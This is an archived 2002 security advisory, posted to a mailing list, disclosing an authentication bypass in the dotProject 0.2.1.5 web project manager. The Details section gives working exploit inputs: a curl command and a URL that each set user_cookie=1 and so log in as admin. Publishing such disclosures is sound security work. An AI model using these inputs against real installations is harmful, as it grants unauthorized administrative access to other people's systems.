php dotProject by pass authentication

From: pokleyzz (pokleyzz@scan-associates.net)
Date: Sun Jul 28 2002 - 20:19:14 PDT

Next message: Theo de Raadt: "Re: VNC authentication weakness"

Previous message: kokane: "KDE 2/3 artsd 1.0.0 local root exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

SCAN Associates Sdn Bhd Security Advisory

Product: dotProject 0.2.1.5 (possibly other)

Vendor URL: http://www.dotmarketing.org/dotproject/

Summary: php dotProject by pass authentication 

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>

Description
===========
dotProject is web base project management system . 
This application consider as beta version.

Details
=======
Everyone can bypass authentication and login as Admin.  
It was rather simple to exploit, user may send a crafted cookie like:

curl -b user_cookie=1 http://server/project/index.php?m=projects

Or simply append user_cookie=1 in any URL:

http://server/project/index.php?m=projects&user_cookie=1

Vendor Response 
=============== 
Vendor has been contacted on 24/7/2002 but no reply. 

www.scan-associates.net <http://www.scan-associates.net>

Next message: Theo de Raadt: "Re: VNC authentication weakness"
Previous message: kokane: "KDE 2/3 artsd 1.0.0 local root exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 29 2002 - 12:12:04 PDT